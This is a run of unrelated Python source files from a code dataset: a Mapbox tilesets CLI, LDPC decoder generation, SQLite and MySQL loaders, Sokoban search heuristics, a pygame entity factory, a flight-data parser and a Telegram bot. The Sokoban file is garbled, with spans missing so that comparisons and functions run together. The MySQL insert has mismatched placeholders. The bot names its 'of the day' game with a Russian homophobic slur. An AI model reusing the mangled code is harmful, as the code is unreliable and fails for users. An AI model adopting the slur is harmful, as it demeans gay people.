\"{0}/tilesets/v1/{1}?access_token={2}\".format(\n mapbox_api, username, mapbox_token\n )\n r = requests.get(url)\n if r.status_code == 200:\n if verbose:\n for tileset in r.json():\n click.echo(json.dumps(tileset, indent=indent))\n else:\n for tileset in r.json():\n click.echo(tileset[\"id\"])\n else:\n raise errors.TilesetsError(r.text)\n\n\n@cli.command(\"validate-recipe\")\n@click.argument(\"recipe\", required=True, type=click.Path(exists=True))\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, 
default=None, help=\"Indent for JSON output\")\ndef validate_recipe(recipe, token=None, indent=None):\n \"\"\"Validate a Recipe JSON document\n\n tilesets validate-recipe <recipe>\n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/validateRecipe?access_token={1}\".format(\n mapbox_api, mapbox_token\n )\n with open(recipe) as json_recipe:\n recipe_json = json.load(json_recipe)\n\n r = requests.put(url, json=recipe_json)\n click.echo(json.dumps(r.json(), indent=indent))\n\n\n@cli.command(\"view-recipe\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef view_recipe(tileset, token=None, indent=None):\n \"\"\"View a tileset's recipe JSON\n\n tilesets view-recipe <tileset>\n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}/recipe?access_token={2}\".format(\n mapbox_api, tileset, mapbox_token\n )\n r = requests.get(url)\n if r.status_code == 200:\n click.echo(json.dumps(r.json(), indent=indent))\n else:\n raise errors.TilesetsError(r.text)\n\n\n@cli.command(\"update-recipe\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.argument(\"recipe\", required=True, type=click.Path(exists=True))\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef update_recipe(tileset, recipe, token=None, indent=None):\n \"\"\"Update a Recipe JSON document for a particular tileset\n\n tilesets update-recipe <tileset> <recipe>\n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}/recipe?access_token={2}\".format(\n mapbox_api, tileset, mapbox_token\n )\n with open(recipe) as json_recipe:\n recipe_json = json.load(json_recipe)\n\n r = requests.patch(url, json=recipe_json)\n if r.status_code == 201:\n click.echo(\"Updated recipe.\", err=True)\n click.echo(r.text)\n else:\n raise errors.TilesetsError(r.text)\n\n\n@cli.command(\"validate-source\")\n@cligj.features_in_arg\ndef validate_source(features):\n \"\"\"Validate your source file.\n $ tilesets validate-source <path>\n \"\"\"\n click.echo(\"Validating features\", err=True)\n\n for feature in features:\n utils.validate_geojson(feature)\n\n click.echo(\"✔ valid\")\n\n\n@cli.command(\"add-source\")\n@click.argument(\"username\", required=True, type=str)\n@click.argument(\"id\", required=True, type=str)\n@cligj.features_in_arg\n@click.option(\"--no-validation\", is_flag=True, help=\"Bypass source file validation\")\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\n@click.pass_context\ndef add_source(ctx, username, id, features, no_validation, token=None, indent=None):\n \"\"\"Create/add a tileset source\n\n tilesets add-source <username> <id> <file>\n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = (\n f\"{mapbox_api}/tilesets/v1/sources/{username}/{id}?access_token={mapbox_token}\"\n )\n\n with tempfile.TemporaryFile() as file:\n for feature in features:\n if not no_validation:\n utils.validate_geojson(feature)\n file.write((json.dumps(feature) + \"\\n\").encode(\"utf-8\"))\n\n file.seek(0)\n m = MultipartEncoder(fields={\"file\": (\"file\", file)})\n resp = requests.post(\n url,\n data=m,\n headers={\n 
\"Content-Disposition\": \"multipart/form-data\",\n \"Content-type\": m.content_type,\n },\n )\n\n if resp.status_code == 200:\n click.echo(json.dumps(resp.json(), indent=indent))\n else:\n raise errors.TilesetsError(resp.text)\n\n\n@cli.command(\"view-source\")\n@click.argument(\"username\", required=True, type=str)\n@click.argument(\"id\", required=True, type=str)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef view_source(username, id, token=None, indent=None):\n \"\"\"View a Tileset Source's information\n\n tilesets view-source <username> <id>\n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/sources/{1}/{2}?access_token={3}\".format(\n mapbox_api, username, id, mapbox_token\n )\n r = requests.get(url)\n if r.status_code == 200:\n click.echo(json.dumps(r.json(), indent=indent))\n else:\n raise errors.TilesetsError(r.text)\n\n\n@cli.command(\"delete-source\")\n@click.argument(\"username\", required=True, type=str)\n@click.argument(\"id\", required=True, type=str)\n@click.option(\"--force\", \"-f\", is_flag=True, help=\"Circumvents confirmation prompt\")\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\ndef delete_source(username, id, force, token=None):\n \"\"\"Delete a Tileset Source + all of its files.\n\n tilesets delete-source <username> <id>\n \"\"\"\n if not force:\n click.confirm(\n \"Are you sure you want to delete {0} {1}?\".format(username, id), abort=True\n )\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/sources/{1}/{2}?access_token={3}\".format(\n mapbox_api, username, id, mapbox_token\n )\n r = requests.delete(url)\n if r.status_code == 204:\n click.echo(\"Source deleted.\")\n else:\n raise errors.TilesetsError(r.text)\n\n\n@cli.command(\"list-sources\")\n@click.argument(\"username\", required=True, type=str)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\ndef list_sources(username, token=None):\n \"\"\"List all Tileset Sources for an account. Response is an un-ordered array of sources.\n\n tilesets list-sources <username>\n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/sources/{1}?access_token={2}\".format(\n mapbox_api, username, mapbox_token\n )\n r = requests.get(url)\n if r.status_code == 200:\n for source in r.json():\n click.echo(source[\"id\"])\n else:\n raise errors.TilesetsError(r.text)\n","sub_path":"mapbox_tilesets/scripts/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":13707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
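Nearly every command in the record above repeats the same tail: build the URL, issue the request, then either pretty-print the JSON body or raise TilesetsError. A minimal sketch of how that shared tail could be factored into one helper; the helper name and its placement are hypothetical, not part of the mapbox-tilesets codebase:

import json

import click
import requests

from mapbox_tilesets import errors  # assumed to match the module's own import


def _echo_or_raise(response, indent=None):
    """Echo pretty-printed JSON on success, raise TilesetsError otherwise."""
    if response.status_code != 200:
        raise errors.TilesetsError(response.text)
    click.echo(json.dumps(response.json(), indent=indent))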
+{"seq_id":"93968242","text":"import matplotlib.pyplot as plt\n\nfrom AWGN_Channel_Transmission.AWGN_Discrete_Density_Evolution import \\\n AWGN_Discrete_Density_Evolution_class_irregular as DDE_irregular\nfrom Discrete_LDPC_decoding.Information_Matching import *\n\n__author__ = \"Maximilian Stark\"\n__copyright__ = \"2016, Institute of Communications, University of Technology Hamburg\"\n__credits__ = [\"Maximilian Stark\"]\n__version__ = \"1.0\"\n__email__ = \"maximilian.stark@tuhh.de\"\n__status__ = \"Production\"\n__name__ = \"Decoder Generation\"\n__doc__ = \"\"\"This script generates a discrete decoder for the desired design-Eb/N0.\"\"\"\n\n\n\n# set noise level for DE\nEbN0_dB_mapping_gen = 0.7\nfor EbN0_dB_mapping_gen in np.array([0.6,0.7,0.8,0.9,1.0]):\n # set quantizer limits\n AD_Max_abs = 3\n plt.figure()\n\n cardinality_Y_channel = 2000\n cardinality_T_channel = 16\n cardinality_T_decoder_ops = 16\n i_max = 50\n nror = 10\n\n # 1 2 3 4 5 6 7\n d_c_dist = np.array([0,0,0,0,0,1,32399]) / 32400\n # 1 2 3 4 5 6 7 8\n d_v_dist = np.array([1,32399,19440,0,0,0,0,12960])/64800\n\n\n lambda_vec = convert_node_to_edge_degree(d_v_dist)\n rho_vec = convert_node_to_edge_degree(d_c_dist)\n\n #R_c = 1-d_v/d_c # code rate\n R_c = 1 - (d_v_dist*(np.arange(d_v_dist.shape[0])+1)).sum() / (d_c_dist*(np.arange(d_c_dist.shape[0])+1)).sum() # code rate\n\n sigma_n2 = 10**(-EbN0_dB_mapping_gen/10) / (2*R_c)\n steps = 5\n\n config = 'cas'\n # generate decoder config\n DDE_inst = DDE_irregular(sigma_n2, AD_Max_abs, cardinality_Y_channel, cardinality_T_channel,\n cardinality_T_decoder_ops, lambda_vec, rho_vec, i_max, nror , match = True)\n\n DDE_inst.run_discrete_density_evolution()\n DDE_inst.save_config(config)\n plt.plot(DDE_inst.DDE_inst_data['MI_T_dvm1_v_X_dvm1_v'],label='match')\n\n\n # DDE_inst = DDE_irregular(sigma_n2, AD_Max_abs, cardinality_Y_channel, cardinality_T_channel,\n # cardinality_T_decoder_ops, lambda_vec, rho_vec, i_max, nror , match = False)\n #\n # DDE_inst.run_discrete_density_evolution()\n # DDE_inst.save_config('adapt_no_match')\n # plt.plot(DDE_inst.DDE_inst_data['MI_T_dvm1_v_X_dvm1_v'],label='no match')\n # plt.legend(loc=4)\n ","sub_path":"Irregular_LDPC_Decoding/DVB-S2/decoder_config_generation.py","file_name":"decoder_config_generation.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
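The script above converts the node-perspective degree distributions d_v_dist and d_c_dist to edge perspective before running density evolution. Assuming convert_node_to_edge_degree implements the standard conversion lambda_i = i * v_i / sum_j(j * v_j), with index 0 holding degree 1, a minimal sketch:

import numpy as np

def convert_node_to_edge_degree(node_dist):
    # Weight each degree fraction by its degree, then renormalize so the
    # result is the fraction of *edges* attached to nodes of that degree.
    degrees = np.arange(node_dist.shape[0]) + 1
    edge_dist = degrees * node_dist
    return edge_dist / edge_dist.sum()

The code-rate line in the script follows the same bookkeeping: R_c = 1 minus the ratio of the mean variable-node degree to the mean check-node degree.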
+{"seq_id":"256562645","text":"import csv\nimport sqlite3\n\n\nconnection = sqlite3.connect('/home/haletod/PycharmProjects/Ligase/students_and_alcohol.db')\ncursor = connection.cursor()\n\n\n# create table with students info\n\n(cursor.execute(\n \"CREATE TABLE IF NOT EXISTS students_info (student_id INTEGER, sex TEXT, age INTEGER, famsize TEXT, Pstatus TEXT, \"\n \"failures INTEGER, health INTEGER, guardian TEXT, PRIMARY KEY(student_id));\"))\n\nwith open('students.csv') as csv_data:\n data = csv.DictReader(csv_data)\n to_db = [\n (i['student_id'], i['sex'], i['age'], i['famsize'], i['Pstatus'], i['failures'], i['health'], i['guardian'])\n for i in data]\n\n(cursor.executemany(\n \"INSERT INTO students_info (student_id, sex, age, famsize, Pstatus, failures, health, guardian) \"\n \"VALUES (?, ?, ?, ?, ?, ?, ?, ?);\",\n to_db))\n\n\n# create table with students alcohol consumption\n\n(cursor.execute(\n \"CREATE TABLE IF NOT EXISTS alcohol_consumption (student_id INTEGER, Daily INTEGER, Weekly INTEGER, \"\n \"PRIMARY KEY(student_id) FOREIGN KEY(student_id) REFERENCES students_info(student_id) ON DELETE CASCADE \"\n \"ON UPDATE CASCADE);\"))\n\nwith open('students.csv') as csv_data:\n data = csv.DictReader(csv_data)\n to_db = [(i['student_id'], i['Dalc'], i['Walc']) for i in data]\n\ncursor.executemany(\"INSERT INTO alcohol_consumption (student_id, Daily, Weekly) VALUES (?, ?, ?);\", to_db)\n\nconnection.commit()\nconnection.close()\n","sub_path":"SQL/SQL_DB_creation.py","file_name":"SQL_DB_creation.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
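One caveat about the schema in the record above: SQLite ships with foreign-key enforcement disabled, so the REFERENCES ... ON DELETE CASCADE clause on alcohol_consumption is silently ignored unless support is switched on, and it must be switched on for every connection:

import sqlite3

connection = sqlite3.connect('students_and_alcohol.db')  # path shortened for illustration
connection.execute("PRAGMA foreign_keys = ON")  # enforcement is off by default in SQLite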
+{"seq_id":"174232316","text":"import numpy as np\nimport os\nfrom search import * #for search engines\nfrom sokoban import SokobanState, Direction, sokoban_goal_state #for Sokoban specific classes and problems\nfrom test_problems import PROBLEMS\n\n#SOKOBAN HEURISTICS\ndef heur_displaced(state):\n '''trivial admissible sokoban heuristic'''\n '''INPUT: a sokoban state'''\n '''OUTPUT: a numeric value that serves as an estimate of the distance of the state to the goal.''' \n count = 0\n for box in state.boxes:\n if box not in state.storage:\n count += 1\n return count\n\ndef heur_manhattan_distance(state):\n#IMPLEMENT\n '''admissible sokoban heuristic: manhattan distance'''\n '''INPUT: a sokoban state'''\n '''OUTPUT: a numeric value that serves as an estimate of the distance of the state to the goal.''' \n #We want an admissible heuristic, which is an optimistic heuristic. \n #It must always underestimate the cost to get from the current state to the goal.\n #The sum Manhattan distance of the boxes to their closest storage spaces is such a heuristic. \n #When calculating distances, assume there are no obstacles on the grid and that several boxes can fit in one storage bin.\n #You should implement this heuristic function exactly, even if it is tempting to improve it.\n #Your function should return a numeric value; this is the estimate of the distance to the goal.\n manhattan_distance = 0\n current_state = []\n goal_state = []\n for box in state.boxes:\n current_state.append(box)\n for storage in state.storage:\n goal_state.append(storage)\n for i in range(len(goal_state)):\n manhattan_distance+= abs(current_state[i][0]-goal_state[i][0])\n manhattan_distance+= abs(current_state[i][1]-goal_state[i][1])\n return manhattan_distance\n\ndef heur_alternate(state):\n#IMPLEMENT\n '''a better sokoban heuristic'''\n '''INPUT: a sokoban state'''\n '''OUTPUT: a numeric value that serves as an estimate of the distance of the state to the goal.''' \n #heur_manhattan_distance has flaws. 
\n #Write a heuristic function that improves upon heur_manhattan_distance to estimate distance between the current state and the goal.\n #Your function should return a numeric value for the estimate of the distance to the goal.\n cost = 0\n if check_corners(state): return float(\"inf\")\n cost += robot_beside_nothing(state)\n cost += distance(state)\n return cost \n\ndef distance(state):\n final_cost = 0\n robot_distance = float(\"inf\")\n robot_position = state.robot\n for box in state.boxes:\n possible_storage = get_possible_storage(box, state)\n tempcost = []\n old_cost = float(\"inf\")\n for possible in possible_storage:\n if box == possible:\n old_cost = 0\n break\n else:\n new_cost = calculate_simple_distance(box, possible, state)\n if new_cost <= old_cost:\n old_cost = new_cost\n final_cost +=old_cost\n if box not in possible_storage:\n final_cost += get_closeness(box,state)\n new_robot_distance = calculate_simple_distance(robot_position, box, state)\n if new_robot_distance=state.width: return True\n if box[1] >=state.height: return True\n return False\n\ndef get_top(box):\n return (box[0],box[1]+1)\ndef get_bottom(box):\n return (box[0],box[1]-1)\ndef get_left(box):\n return (box[0]-1,box[1])\ndef get_right(box):\n return (box[0]+1,box[1])\n\ndef robot_beside_nothing(state):\n robot_position = state.robot\n cost = 0\n if (robot_position[0]+1, robot_position[1]) in state.boxes:\n test = (robot_position[0]+2, robot_position[1]) in state.boxes\n if test in state.boxes or test in state.obstacles:\n cost+= 2\n else:\n return cost\n if (robot_position[0]-1, robot_position[1]) in state.boxes:\n test = (robot_position[0]-2, robot_position[1]) in state.boxes\n if test in state.boxes or test in state.obstacles:\n cost+= 2\n else:\n return cost\n if (robot_position[0], robot_position[1]+1) in state.boxes:\n test = (robot_position[0], robot_position[1]+2) in state.boxes\n if test in state.boxes or test in state.obstacles:\n cost+= 2\n else:\n return cost\n if (robot_position[0], robot_position[1]-1) in state.boxes:\n test = (robot_position[0], robot_position[1]-2) in state.boxes\n if test in state.boxes or test in state.obstacles:\n cost+= 2\n else:\n return cost\n cost+=1\n if (robot_position[0]+1, robot_position[1]+1) in state.boxes: return cost\n if (robot_position[0]-1, robot_position[1]-1) in state.boxes: return cost\n if (robot_position[0]-1, robot_position[1]+1) in state.boxes: return cost\n if (robot_position[0]+1, robot_position[1]-1) in state.boxes: return cost\n return cost+2\n\ndef calculate_simple_distance(box, possible,state):\n return abs(box[0]-possible[0])+ abs(box[1]-possible[1])\n\ndef is_cornered(position, state):\n if position[0] == 0:\n if position[1] == 0: return True\n if position[1] == state.height-1: return True\n if (position[0], position[1]-1) in state.obstacles: return True\n if (position[0], position[1]+1) in state.obstacles: return True\n return False \n if position[0] == state.width-1:\n if position[1] == 0: return True\n if position[1] == state.height-1: return True\n if (position[0]-1, position[1]) in state.obstacles: return True\n if (position[0]+1, position[1]) in state.obstacles: return True \n return False \n testabove = (position[0]-1, position[1])\n testbelow = (position[0]+1, position[1])\n testleft = (position[0], position[1]-1)\n testright = (position[0], position[1]+1)\n if testabove in state.obstacles:\n if testleft in state.obstacles: return True\n if testright in state.obstacles: return True\n if testbelow in state.obstacles:\n if testleft in 
state.obstacles: return True\n if testright in state.obstacles: return True\n return False\n\ndef check_corners(state):\n for box in state.boxes:\n possible_storage = get_possible_storage(box, state)\n if box not in possible_storage:\n if is_cornered(box, state): return True\n # if is_edge(box, possible_storage,state): return True\n return False\n\ndef get_possible_storage(box,state):\n if state.restrictions != None:\n possible = state.restrictions[state.boxes[box]]\n if box in possible:\n return [box]\n for other_boxes in state.boxes:\n if box != other_boxes:\n if other_boxes in possible and other_boxes in state.restrictions[state.boxes[other_boxes]]:\n possible = possible.difference(other_boxes)\n return possible\n else:\n possible = []\n for place in state.storage:\n possible.append(place)\n if box in possible:\n return [box]\n for other_boxes in state.boxes: \n if box != other_boxes:\n if other_boxes in possible:\n possible.remove(other_boxes) \n return possible\n\n\ndef fval_function(sN, weight):\n#IMPLEMENT\n \"\"\"\n Provide a custom formula for f-value computation for Anytime Weighted A star.\n Returns the fval of the state contained in the sNode.\n\n @param sNode sN: A search node (containing a SokobanState)\n @param float weight: Weight given by Anytime Weighted A star\n @rtype: float\n \"\"\"\n \n #Many searches will explore nodes (or states) that are ordered by their f-value.\n #For UCS, the fvalue is the same as the gval of the state. For best-first search, the fvalue is the hval of the state.\n #You can use this function to create an alternate f-value for states; this must be a function of the state and the weight.\n #The function must return a numeric f-value.\n #The value will determine your state's position on the Frontier list during a 'custom' search.\n #You must initialize your search engine object as a 'custom' search engine if you supply a custom fval function.\n fval = sN.gval + weight*sN.hval\n return fval\n\n\ndef anytime_gbfs(initial_state, heur_fn, timebound = 10):\n#IMPLEMENT\n '''Provides an implementation of anytime greedy best-first search, as described in the HW1 handout'''\n '''INPUT: a sokoban state that represents the start state and a timebound (number of seconds)'''\n '''OUTPUT: A goal state (if a goal is found), else False''' \n time_end = os.times()[0]+timebound\n search = SearchEngine('best_first')\n search.init_search(initial_state, sokoban_goal_state, heur_fn)\n time_left = time_end - os.times()[0]\n output = False\n prev_cost = float(\"inf\")\n while time_left > 0:\n goal = search.search(time_left)\n if goal != False:\n if goal.gval 0:\n goal = search.search(time_left)\n if goal != False:\n if goal.gval 0:\n nums.append(re.findall('([0-9]+)', line))\n\t\nfor num in nums:\n for n in num:\n total = total + int(n)\n\n\nprint(total)","sub_path":"regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
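The anytime search loops in the record above are cut off mid-comparison (the fragments read `if goal.gval 0:`), so the pruning logic does not survive. A sketch of the standard anytime pattern the surviving fragments point to, keep searching while time remains and remember the cheapest goal found so far; the exact bookkeeping is an assumption:

import os

def anytime_search_loop(search, time_end):
    """Repeatedly search within the remaining time, keeping the best goal."""
    output = False
    prev_cost = float("inf")
    time_left = time_end - os.times()[0]
    while time_left > 0:
        goal = search.search(time_left)
        if goal != False:
            if goal.gval < prev_cost:  # strictly cheaper solution found
                prev_cost = goal.gval
                output = goal
            time_left = time_end - os.times()[0]
        else:
            break
    return output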
+{"seq_id":"292896724","text":"\"\"\"/pidor command.\"\"\"\n\nfrom telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup\nfrom telegram.ext import CallbackContext, run_async\nfrom telegram.error import BadRequest\n\nfrom main import randomizer\nfrom main.database import *\nfrom main.constants import DEVS\nfrom main.helpers import antispam_passed, check_if_group_chat, ResetError\n\n\n@run_async\n@antispam_passed\n@check_if_group_chat\n@db_session\ndef pidor(update: Update, context: CallbackContext):\n \"\"\"Get the pidor of the day from all users stored for the chat.\"\"\"\n # Check if there is already a pidor of the day\n pidor_today = select(q.user_id.full_name for q in Pidors\n if q.chat_id == Chats[update.message.chat.id]\n and q.day == date.today())[:][:]\n if pidor_today:\n update.message.reply_text(\n text=f'Пидором дня является {pidor_today[0]}!')\n return\n keyboard = InlineKeyboardMarkup.from_button(\n InlineKeyboardButton('Реролл #1 (только админы)', callback_data='Reroll.1'))\n update.message.reply_text(text=f'Пидором дня является {getnew(update).result()}!',\n parse_mode='Markdown',\n reply_markup=keyboard)\n\n\n@run_async\n@db_session\ndef getnew(update: Update) -> str:\n \"\"\"Look for new pidor.\"\"\"\n chat_users = select(q.user_id for q in User_Stats\n if q.chat_id == Chats[update.message.chat.id])[:][:]\n # Find a pidor that's still in the chat and delete those that are gone.\n while chat_users:\n pidor = randomizer.choice(chat_users)\n try:\n pidor_data = update.message.chat.get_member(user_id=pidor.id)\n if pidor_data.status not in ['restricted', 'left', 'kicked'] and \\\n not pidor_data.user.is_bot:\n break\n else:\n delete(u for u in User_Stats\n if u.user_id == pidor\n and u.chat_id == Chats[update.message.chat.id])\n chat_users.remove(pidor)\n except BadRequest:\n delete(u for u in User_Stats\n if u.user_id == pidor\n and u.chat_id == Chats[update.message.chat.id])\n chat_users.remove(pidor)\n else:\n update.message.reply_text('Нужно больше данных!')\n raise ResetError\n # Assign a tag\n Users[pidor.id].full_name = pidor_data.user.full_name\n pidor_tag = f'[{pidor.full_name}](tg://user?id={pidor.id})'\n if not Pidors.exists(chat_id=Chats[update.message.chat.id]):\n Pidors(chat_id=Chats[update.message.chat.id],\n user_id=pidor,\n day=date.today())\n else:\n Pidors[Chats[update.message.chat.id]].user_id = pidor\n Pidors[Chats[update.message.chat.id]].day = date.today()\n # Record and return\n User_Stats[Users[pidor.id],\n Chats[update.message.chat.id]].times_pidor += 1\n return pidor_tag\n\n\n@run_async\n@db_session\ndef reroll(update: Update, context: CallbackContext):\n \"\"\"Reroll pidor of the day.\"\"\"\n admins = [u.user for u in context.bot.get_chat_administrators(\n update.callback_query.message.chat.id)]\n if update.callback_query.from_user in admins or \\\n update.callback_query.from_user.id in DEVS:\n rolln = int(\n update.callback_query.message.reply_markup.inline_keyboard[0][0].callback_data.split('.')[-1]) + 1\n keyboard = InlineKeyboardMarkup.from_button(\n InlineKeyboardButton(f'Реролл #{rolln} (только админы)',\n callback_data=f'Reroll.{rolln}'))\n update.callback_query.message.edit_text(\n text=f'Пидором дня является {getnew(update.callback_query).result()}!',\n parse_mode='Markdown',\n reply_markup=keyboard)\n","sub_path":"main/commands/pidor.py","file_name":"pidor.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"632487797","text":"import mysql.connector\n\n#global variable allows us to update page\ntimeToUpdate = 0\n#\ndef createTables(mycursor):\n try:\n mycursor.execute(\"CREATE TABLE IF NOT EXISTS StudentInfo(BaylorID CHAR (9),\"\n \"lastName VARCHAR (30),\"\n \"firstName VARCHAR (30),\"\n \"emailAddress VARCHAR (30),\"\n \"ADV_PR_semester VARCHAR (30),\"\n \"class VARCHAR (20),\"\n \"major_minor VARCHAR(5),\"\n \"ADV_PR_grade CHAR(1),\"\n \"ADV_PR_year CHAR(4),\"\n \"PRIMARY KEY (BaylorID))\")\n except mysql.connector.Error as err:\n print(err.msg)\n\n try:\n mycursor.execute(\"CREATE INDEX assign_ibfk_1 ON StudentInfo(BaylorID)\")\n except mysql.connector.errors.ProgrammingError as err:\n index_created = True\n\n try:\n mycursor.execute(\"CREATE TABLE IF NOT EXISTS Internship(company VARCHAR (50),\"\n \"startMonth VARCHAR (15),\"\n \"startYear CHAR (4),\"\n \"endMonth VARCHAR (15),\"\n \"endYear CHAR (4),\"\n \"address VARCHAR(80),\"\n \"phoneNumber CHAR(11),\"\n \"totalHours INT,\"\n \"BaylorID CHAR(9),\"\n \"supervisorName VARCHAR(50),\"\n \"PRIMARY KEY (BaylorID, company, supervisorName),\"\n \"FOREIGN KEY (BaylorID) REFERENCES StudentInfo(BaylorID))\")\n except mysql.connector.Error as err:\n print(err.msg)\n\n\n\ndef insertIntoStudentInfo(idEntry, lastnameEntry, firstnameEntry, emailEntry, semesterEntry, classyr, major_minor, grade, year, mycursor, mydb, middleFrame, topFrame):\n try:\n sqlFormula = \"INSERT INTO StudentInfo (BaylorID, lastName, firstName, emailAddress, ADV_PR_semester, class, major_minor, ADV_PR_grade, ADV_PR_year) \" \\\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n mycursor.execute(sqlFormula, (idEntry, lastnameEntry, firstnameEntry, emailEntry, semesterEntry, classyr, major_minor, grade, year))\n mydb.commit()\n except mysql.connector.Error as error:\n print(\"could not be inserted\")\n\ndef insertIntoInternship(companyEntry, startmoEntry, startyrEntry, endmoEntry, endyrEntry, addressEntry, numberEntry, totHoursEntry, idEntry, supNameEntry, mycursor, mydb, middleFrame, topFrame):\n # print (\"The company is\", companyEntry)\n # print (\"The start month is\", startmoEntry)\n # print (\"The start year is\", startyrEntry)\n # print (\"The end month is\", endmoEntry)\n # print (\"The end year is\", endyrEntry)\n # print (\"The address is\", addressEntry)\n # print (\"The number is\", numberEntry)\n # print (\"The total hours is\", totHoursEntry)\n # print (\"The id is\", idEntry)\n # print (\"The supervisor is\", supNameEntry)\n\n try:\n sqlFormula = \"INSERT INTO Internship (company, startMonth, startYear, endMonth, endYear, address, phoneNumber, totalHours, BaylorID, supervisorName) \" \\\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n mycursor.execute(sqlFormula, (companyEntry, startmoEntry, startyrEntry, endmoEntry, endyrEntry, addressEntry, numberEntry, totHoursEntry, idEntry, supNameEntry))\n mydb.commit()\n except mysql.connector.Error as error:\n print(\"could not be inserted\")\n","sub_path":"Marquise_Working_Flask/User_Inputed_Data.py","file_name":"User_Inputed_Data.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
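Note that insertIntoStudentInfo in the record above lists nine columns but its VALUES clause contains ten %s placeholders, so execute() will always fail with a parameter-count error, and the bare except then prints "could not be inserted" with no hint of the cause. A corrected statement with the placeholder count matching the column count (printing the caught error would also help):

sqlFormula = ("INSERT INTO StudentInfo (BaylorID, lastName, firstName, emailAddress, "
              "ADV_PR_semester, class, major_minor, ADV_PR_grade, ADV_PR_year) "
              "VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)")  # nine placeholders, nine columns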
+{"seq_id":"438353296","text":"from GameObject import GameObject\r\nfrom EnemyComponents import *\r\nfrom PlayerComponents import *\r\nfrom Room import Room\r\n\r\n\r\nclass EntityFactory:\r\n @classmethod\r\n def create_entity(cls, entity: dict):\r\n if entity['type'] == 'Level':\r\n collision = pygame.image.load(entity[\"collision\"])\r\n return Room(collision=pygame.image.load(entity[\"collision\"]),\r\n image=pygame.image.load(entity[\"graphics\"]),)\r\n\r\n elif entity['type'] == 'Player':\r\n collision = pygame.image.load(entity[\"collision\"])\r\n mask = pygame.mask.from_surface(collision)\r\n return GameObject(PlayerStateComponent(), GraphicsComponent(player_frames), collision=mask)\r\n\r\n elif entity['type'] == 'Slime':\r\n return GameObject(EnemyStateComponent(), GraphicsComponent(slime_frames))\r\n\r\n elif entity['type'] == 'Sword':\r\n collision = pygame.image.load(entity[\"collision\"])\r\n mask = pygame.mask.from_surface(collision)\r\n return GameObject(PlayerStateComponent(), GraphicsComponent(sword_all_frames), collision = mask)\r\n\r\n elif entity['type'] == 'Shield':\r\n collision = pygame.image.load(entity[\"collision\"])\r\n mask = pygame.mask.from_surface(collision)\r\n return GameObject(PlayerStateComponent(), GraphicsComponent(shield_all_frames), collision = mask)\r\n","sub_path":"EntityFactory.py","file_name":"EntityFactory.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"130961111","text":"# Create the empty lists\nflightID = []\ntrackID = []\nx = []\ny = []\nmodec = []\ncallsign = []\nicao = []\ndest = []\nadep = []\nflighttype = []\nradar = []\ntakeofftime = []\ntime = []\n\n\nxp = []\nyp = []\n\n\n# This part opens the file to be read, it's the Schiphol outbound data file\nf = open(\"outbound.txt\", \"r\")\nlines = f.readlines()\n\n# First the file is made readable by replacing ',' with ' ',\n# then the data lists are made, flightID1 and trackID1 were assumed redundant\n# It runs from [1:421] to get rid of the first line and to have\n# only two flights for testing purposes. For only one flight, use [1:216] instead.\n\n \ntxt = []\n\nfor line in lines[1:]:\n txt = line.split(',')\n flightID.append(txt[0])\n trackID.append(txt[2])\n x.append(txt[4])\n y.append(txt[5])\n modec.append(txt[6])\n callsign.append(txt[7])\n icao.append(txt[8])\n dest.append(txt[9])\n adep.append(txt[10])\n flighttype.append(txt[11])\n radar.append(txt[12])\n takeofftime.append(txt[13])\n time.append(txt[14])\n\n# Now all the numbers have to be changed to floats\nxp = map(float,x)\nyp = map(float,y)\n\n# The time has to be made usable\n# First all the lists\ntime0 = []\ntime1 = []\ntime2 = []\ntime3 = []\ntime4 = []\ntime5 = []\ntime6 = []\n\ntime0l = []\ntime1l = []\ntime2l = []\ntime3l = []\ntime4l = []\ntime5l = []\nt = []\n\nt = []\ntl = []\nh = []\nm = []\ns = []\n\n# Now we only want the actual 